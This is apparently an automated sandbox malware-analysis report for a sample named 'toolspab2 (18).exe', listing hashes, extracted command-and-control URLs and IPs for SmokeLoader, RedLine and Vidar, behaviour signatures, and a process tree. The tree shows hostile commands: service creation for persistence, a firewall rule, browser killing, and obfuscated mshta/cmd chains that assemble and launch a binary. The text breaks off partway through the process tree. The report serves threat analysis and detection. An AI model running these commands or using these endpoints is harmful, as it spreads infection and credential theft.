Overview

overview

10

Static

static

toolspab2 (1).exe

windows7_x64

10

toolspab2 (1).exe

windows10_x64

10

toolspab2 (10).exe

windows7_x64

10

toolspab2 (10).exe

windows10_x64

10

toolspab2 (11).exe

windows7_x64

10

toolspab2 (11).exe

windows10_x64

10

toolspab2 (12).exe

windows7_x64

10

toolspab2 (12).exe

windows10_x64

10

toolspab2 (13).exe

windows7_x64

10

toolspab2 (13).exe

windows10_x64

10

toolspab2 (14).exe

windows7_x64

10

toolspab2 (14).exe

windows10_x64

10

toolspab2 (15).exe

windows7_x64

10

toolspab2 (15).exe

windows10_x64

10

toolspab2 (16).exe

windows7_x64

10

toolspab2 (16).exe

windows10_x64

10

toolspab2 (17).exe

windows7_x64

10

toolspab2 (17).exe

windows10_x64

10

toolspab2 (18).exe

windows7_x64

10

toolspab2 (18).exe

windows10_x64

10

toolspab2 (19).exe

windows7_x64

10

toolspab2 (19).exe

windows10_x64

10

toolspab2 (2).exe

windows7_x64

10

toolspab2 (2).exe

windows10_x64

10

toolspab2 (20).exe

windows7_x64

10

toolspab2 (20).exe

windows10_x64

10

toolspab2 (21).exe

windows7_x64

10

toolspab2 (21).exe

windows10_x64

10

toolspab2 (22).exe

windows7_x64

10

toolspab2 (22).exe

windows10_x64

10

toolspab2 (23).exe

windows7_x64

10

toolspab2 (23).exe

windows10_x64

10

Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-07-2021 23:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    toolspab2 (18).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Score
10/10
gluptebametasploitredlinesmokeloadersocelarstofseevidar1824btconlybackdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealertrojanvmprotect

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

82.202.161.37:26317

Extracted

Family

redline

Botnet

BtcOnly

C2

185.53.46.82:3214

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    824

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 45 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:596
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1840
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            PID:2344
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4040
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1740
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:1236
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:4220
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:5868
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:5336
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:6140
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1076
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1212
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1204
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1852
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2708
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2696
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                          1⤵
                          • Suspicious use of SetThreadContext
                          PID:2788
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:6100
                        • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                          "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                          1⤵
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:628
                          • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                            "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:2864
                        • C:\Users\Admin\AppData\Local\Temp\7129.exe
                          C:\Users\Admin\AppData\Local\Temp\7129.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1976
                          • C:\Users\Admin\AppData\Local\Temp\7129.exe
                            C:\Users\Admin\AppData\Local\Temp\7129.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3052
                        • C:\Users\Admin\AppData\Local\Temp\759F.exe
                          C:\Users\Admin\AppData\Local\Temp\759F.exe
                          1⤵
                          • Executes dropped EXE
                          PID:636
                        • C:\Users\Admin\AppData\Local\Temp\790B.exe
                          C:\Users\Admin\AppData\Local\Temp\790B.exe
                          1⤵
                          • Executes dropped EXE
                          PID:3068
                        • C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          1⤵
                          • Executes dropped EXE
                          PID:4040
                        • C:\Users\Admin\AppData\Local\Temp\8523.exe
                          C:\Users\Admin\AppData\Local\Temp\8523.exe
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3796
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4012
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:1888
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:1560
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                • Suspicious behavior: MapViewOfSection
                                PID:2980
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:768
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2796
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:396
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1176
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:3008
                                    • C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3136
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 480
                                        2⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3620
                                    • C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2080
                                    • C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:568
                                      • C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp" /SL5="$70038,506127,422400,C:\Users\Admin\AppData\Local\Temp\FEF0.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3796
                                        • C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                          3⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          PID:3800
                                          • C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe
                                            "C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1324
                                            • C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp" /SL5="$10228,5808768,66560,C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                              5⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4120
                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:4488
                                          • C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe
                                            "C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4032
                                          • C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe
                                            "C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4300
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubwmeyfn.iis\GcleanerEU.exe /eufive & exit
                                              5⤵
                                                PID:920
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oun3zgq3.1be\installer.exe /qn CAMPAIGN="654" & exit
                                                5⤵
                                                  PID:3988
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe & exit
                                                  5⤵
                                                    PID:5328
                                                    • C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5640
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5964
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5564
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:716
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:1640
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe & exit
                                                    5⤵
                                                      PID:5976
                                                      • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:6136
                                                        • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe" -a
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:1092
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52oojsez.zd4\GcleanerWW.exe /mixone & exit
                                                      5⤵
                                                        PID:4972
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe & exit
                                                        5⤵
                                                          PID:1764
                                                          • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4188
                                                            • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5692
                                                • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:2208
                                                  • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\913.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:1400
                                                • C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:3984
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\btekfjwo\
                                                    2⤵
                                                      PID:1336
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cfxzukov.exe" C:\Windows\SysWOW64\btekfjwo\
                                                      2⤵
                                                        PID:2064
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" create btekfjwo binPath= "C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe /d\"C:\Users\Admin\AppData\Local\Temp\CDC.exe\"" type= own start= auto DisplayName= "wifi support"
                                                        2⤵
                                                          PID:3456
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" description btekfjwo "wifi internet conection"
                                                          2⤵
                                                            PID:3768
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start btekfjwo
                                                            2⤵
                                                              PID:2988
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              2⤵
                                                                PID:1320
                                                            • C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:996
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                2⤵
                                                                  PID:2144
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    PID:4236
                                                              • C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4040
                                                              • C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:3052
                                                              • C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:1804
                                                              • C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4072
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                  2⤵
                                                                    PID:2028
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\2D98.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\2D98.exe") do taskkill -f /Im "%~nxs"
                                                                      3⤵
                                                                        PID:4128
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill -f /Im "2D98.exe"
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:4760
                                                                        • C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
                                                                          ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4628
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                            5⤵
                                                                              PID:5060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
                                                                                6⤵
                                                                                  PID:3716
                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                "C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )
                                                                                5⤵
                                                                                  PID:4644
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *
                                                                                    6⤵
                                                                                      PID:1872
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
                                                                                        7⤵
                                                                                          PID:3888
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
                                                                                          7⤵
                                                                                            PID:4876
                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                            regsvr32.exe ..\LphZr4.XZ /U -S
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                            PID:5236
                                                                              • C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks processor information in registry
                                                                                PID:816
                                                                                • C:\Windows\SysWOW64\cmd.exe
